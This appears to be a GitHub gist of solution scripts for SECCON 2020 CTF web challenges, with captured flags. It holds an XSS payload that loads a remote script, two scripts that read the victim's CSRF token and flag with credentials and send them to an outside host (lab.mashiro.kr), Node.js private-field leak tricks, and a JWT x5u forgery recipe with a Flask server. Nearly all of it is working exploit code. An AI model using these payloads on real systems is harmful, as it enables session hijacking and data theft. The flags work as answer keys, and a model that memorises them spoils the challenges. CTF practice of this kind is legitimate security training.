Skip to content

Instantly share code, notes, and snippets.

@shpik-kr
Last active October 12, 2020 14:00
Show Gist options
  • Save shpik-kr/e52d3c89714e14fa18c266b97dbf4d63 to your computer and use it in GitHub Desktop.
Save shpik-kr/e52d3c89714e14fa18c266b97dbf4d63 to your computer and use it in GitHub Desktop.
SECCON 2020 - Web
var __classPrivateFieldSet = function(receiver, privateMap, value) {
if (!privateMap.has(receiver)) {
throw new TypeError(
"attempted to set private field on non-instance"
);
}
privateMap.set(receiver, value);
console.log(privateMap.get(flag));
return value;
};
new Flag("1234")
// SECCON{Player_WorldOfFantasy_StereoWorXxX_CapsLock_WaveRunner}
const util = require('util');
const inspector = require('inspector');
const session = new inspector.Session();
session.connect();
this.__proto__.aa= flag;
session.post('Runtime.evaluate', {
expression: `aa;`
}, (error, { result }) => {
console.log(result);
session.post('Runtime.getProperties',
{ objectId: result.objectId },
(error, { privateProperties }) => {
console.log('private properties', privateProperties);
});
});
// SECCON{HighCollarGirl_CutieCinem@Replay_PhonyPhonic_S.F.SoundFurniture}
# index.html (for reporting)
<script>
location.href="https://milk-revenge.chal.seccon.jp/note.php/..;/note.php?id=5f820da700115b0700127762&_=a%20onerror=$.getScript(%27https://lab.mashiro.kr/bb.js%27);";
</script>
# aa.js
var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (xhr.readyState === xhr.DONE) {let xhr2 = new XMLHttpRequest();xhr2.open('GET', 'https://lab.mashiro.kr/?c='+xhr.responseText);xhr2.send();};};xhr.withCredentials=true;xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/csrf-token?_=aaaaaaaaaaaaaaaaaaaaaaaaaaaa');xhr.send();
# bb.js
var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (xhr.readyState === xhr.DONE) {let xhr2 = new XMLHttpRequest();xhr2.open('GET', 'https://lab.mashiro.kr/?c='+xhr.responseText);xhr2.send();};};xhr.withCredentials=true;xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/notes/flag?token=c5fe8848-9278-404f-9dfe-2ede7f41077c');xhr.send();
milk: SECCON{I_am_heavily_concerning_about_unintended_sols_so_I_dont_put_any_spoiler_here_but_anyway_congrats!}
milk revenge: SECCON{Okay_there_was_actually_unintended_solution_as_I_intended_blahblah}
1. make jwt and signing any private key
2. change x5u url as below server on running app.py
3. get flag: SECCON{1_w0uLd_L1K3_70_347_r4M3N_1N5734d_0f_p4574}
# app.py
from flask import Flask
c = False
app = Flask(__name__)
@app.route("/root.crt")
def aa():
global c
if c == False:
c = True
with open("root.crt") as f:
q = f.read()
return q
else:
c = False
print "hello"
if __name__ == "__main__":
app.run(host="0.0.0.0", port=2368, debug=True)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment